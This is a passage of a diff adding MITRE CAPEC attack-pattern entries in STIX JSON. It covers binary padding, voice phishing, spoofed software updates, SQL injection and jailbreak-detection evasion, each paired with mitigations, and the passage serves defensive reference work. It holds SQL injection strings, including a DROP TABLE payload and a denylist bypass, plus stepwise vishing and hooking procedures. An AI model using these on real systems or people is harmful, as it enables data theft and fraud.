"attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.\n In addition to this, adding data to a file also changes the file's hash, frustrating security tools that look for known bad files by their hash.\n ", + "external_references": [ + { + "external_id": "CAPEC-655", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/655.html" + }, + { + "description": "Obfuscated Files or Information:Binary padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Avoid Security Tool Identification by Adding Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716" + ], + "x_capec_consequences": { + "Accountability": [ + "Hide Activities", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn't typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a \"cold call\" or by the victim if calling an illegitimate telephone number.", + "external_references": [ + { + "external_id": "CAPEC-656", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/656.html" + }, + { + "description": "Jovi Umawing, Something else is phishy: How to detect phishing attempts on mobile phones , 2018--12---10, Malwarebytes", + "external_id": "REF-592", + "source_name": "reference_from_CAPEC", + "url": "https://blog.malwarebytes.com/101/2018/12/something-else-phishy-detect-phishing-attempts-mobile/" + }, + { + "description": "Jennifer van der Kleut, What is vishing? Tips for spotting and avoiding voice scams, NortonLifeLock Inc.", + "external_id": "REF-594", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/document/6604058/authors#authors" + }, + { + "description": "What Is Vishing?, AO Kaspersky Lab", + "external_id": "REF-595", + "source_name": "reference_from_CAPEC", + "url": "https://www.kaspersky.com/resource-center/definitions/vishing" + } + ], + "id": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Voice Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Vishing", + "VoIP Phishing" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target receives an email or text message stating that their Apple ID has been disabled due to suspicious activity and that the included link includes instructions on how to unlock their Apple account. The link in the text message looks legitimate and once the link is clicked, the user is redirected to a legitimate-looking webpage that prompts the user to call a specified number to initiate the unlock process. The target initiates the phone call and provides their credentials or other sensitive information to the individual they assume works for Apple. Now that the adversary possess this data, it can be used to log into the account to obtain other sensitive data, such as Apple Pay information.", + "An adversary calls the target and claims to work for their bank. The adversary informs the target that their bank account has been frozen, due to potential fraudulent spending, and requires authentication in order to re-enable the account. The target, believing the caller is a legitimate bank employee, provides their bank account login credentials to confirm they are the authorized owner of the account. The adversary then confirms this authentication and claims that the account has been unlocked. Once the adversary has obtained these credentials, money can be transferred from the victim's account to an account controlled by the adversary." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate organization more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. If the adversary leverages cold-calling for this attack, this step is skipped.

    2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate organization's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)
    Optionally obtain a legitimate SSL certificate for the new domain name.

  2. Explore legitimate website and create duplicate: An adversary optionally creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the organization's website that they are trying to impersonate. That website will contain a telephone number for the victim to call to assist them with their issue and initiate the attack. If the adversary leverages cold-calling for this attack, this step is skipped.

    3. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look and feel, but contain completely new content.

Exploit

  1. Convince user to provide sensitive information to the adversary.: An adversary \"cold calls\" the victim or receives a call from the victim via the malicious site and provides a call-to-action, in order to persuade the user into providing sensitive details to the adversary (e.g. login credentials, bank account information, etc.). The key is to get the victim to believe that the individual they are talking to is from a legitimate entity with which the victim does business and that the call is occurring for legitimate reasons. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.

    2. Techniques
    Call the user a from a spoofed legitimate-looking telephone number.

  2. Use stolen information: Once the adversary obtains the sensitive information, this information can be leveraged to log into the victim's bank account and transfer money to an account of their choice, or to make fraudulent purchases with stolen credit card information.

    3. Techniques
    Login to the legitimate site using another the victim's supplied credentials
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary needs phone numbers to initiate contact with the victim, in addition to a legitimate-looking telephone number to call the victim from.", + "An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \"hooks\" to many potential victims.", + "An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.", + "If passively conducting this attack via a spoofed website, replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity." + ], + "x_capec_resources_required": [ + "Legitimate-looking telephone number(s) to initiate calls with victims" + ], + "x_capec_skills_required": { + "Medium": "Basic knowledge about websites: obtaining them, designing and implementing them, etc." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not accept calls from unknown numbers or from numbers that may be flagged as spam. Also, do not call numbers that appear on-screen after being unexpectedly redirected to potentially malicious websites. In either case, do not provide sensitive information over voice calls that are not legitimately initiated. Instead, call your Bank, PayPal, eBay, etc., via the number on their public-facing website and inquire about the problem.", + "id": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-656-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--244a5166-f226-4066-b561-6df35600a91c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e3af87a-42f6-4c03-85e4-aaa333a97b18", + "spec_version": "2.1", + "target_ref": "attack-pattern--ec0a802f-1d0a-4360-a4d8-3fb9f48715d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.", + "external_references": [ + { + "external_id": "CAPEC-657", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/657.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Software Deployment Tools", + "external_id": "T1072", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1072" + } + ], + "id": "attack-pattern--9b9760ba-c8de-42c7-9de0-3a5ee2d2abdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Automated Software Update via Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input.", + "external_references": [ + { + "external_id": "CAPEC-66", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/66.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "SQL Injection", + "external_id": "19", + "source_name": "WASC", + "url": "http://projects.webappsec.org/SQL-Injection" + }, + { + "description": "SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/SQL_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-607", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.html" + } + ], + "id": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as \"foo'/**/UNION\" or \"foo UNION/**/\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker first takes an inventory of the functionality exposed by the application.

    2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

  2. Experiment with SQL Injection vulnerabilities: After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.

    3. Techniques
    Use public resources such as \"SQL Injection Cheat Sheet\" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.
    Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : \"' OR 1=1; --\", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.
    Use \"Blind SQL Injection\" techniques to extract information about the database schema.
    If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: \"'; DROP TABLE SYSOBJECTS; --\" and \"'); DROP TABLE SYSOBJECTS; --\". These particular queries will likely not work because the SYSOBJECTS table is generally protected.

Exploit

  1. Exploit SQL Injection vulnerability: After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.

    2. Techniques
    Craft and Execute underlying SQL query
", + "x_capec_extended_description": "\n When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "attack-pattern--35bde6ec-0a19-462c-92b4-9c481dc4986e", + "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269" + ], + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a93f8f1b-9607-4383-9b6f-7be3de09fc48", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "spec_version": "2.1", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.", + "id": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fc50ca5-d17c-4f39-96d4-795ef6ac0bb1", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b3ecd49-a48b-4908-b854-071ac6b15f1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df5e28f8-bb74-4412-960d-bef6cec27c9f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--618c2d85-ca76-40a0-a019-0ac9ba1b0989", + "spec_version": "2.1", + "target_ref": "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to \"hook\" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-660", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/660.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Process Injection", + "external_id": "T1055", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055" + }, + { + "description": "Ansgar Kellner, Micha Horlboge, Konrad Rieck, Christian Wressnegger, False Sense of Security: A Study on the Effectivity of Jailbreak Detection in Banking Apps, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-624", + "source_name": "reference_from_CAPEC", + "url": "https://cybersecurity.att.com/blogs/security-essentials/mobile-phishing" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + } + ], + "id": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Hooking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. The adversary creates Objective-C runtime code that always returns \"false\" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns \"false\", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.", + "An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

    2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Develop code to be hooked into chosen target application: The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.

    2. Techniques
    Develop code or leverage existing code to bypass Root/Jailbreak detection methods.
    Test the code to see if it works.
    Iteratively develop the code until Root/Jailbreak detection methods are evaded.

Exploit

  1. Execute code hooking to evade Root/Jailbreak detection methods: Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.

    2. Techniques
    Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted application must be non-restricted to allow code hooking." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device.", + "The adversary needs to have enough access to the target application to control the included code or file." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about code hooking." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.", + "id": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ed05e0f-72dd-495e-af10-e186067c014b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a26576b7-5508-45c7-b841-988783c129d3", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other Root/Jailbreak detection methods.", + "id": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66be5c7d-d8d0-490b-93f7-33a6b9a2ee47", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab5ae276-92d5-4d92-8409-8a4400de6800", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect the application's stack trace for suspicious method calls.", + "id": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--625a5ed4-6a77-4589-80db-7eb242928389", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43850af6-9f1d-4bb9-a858-9d516bf243f7", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.", + "id": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-660-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6aaf6432-9f26-4d24-9622-96e8a784c382", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8677776-34d9-4dae-add9-a6e12cfc342e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For iOS applications, ensure application methods do not 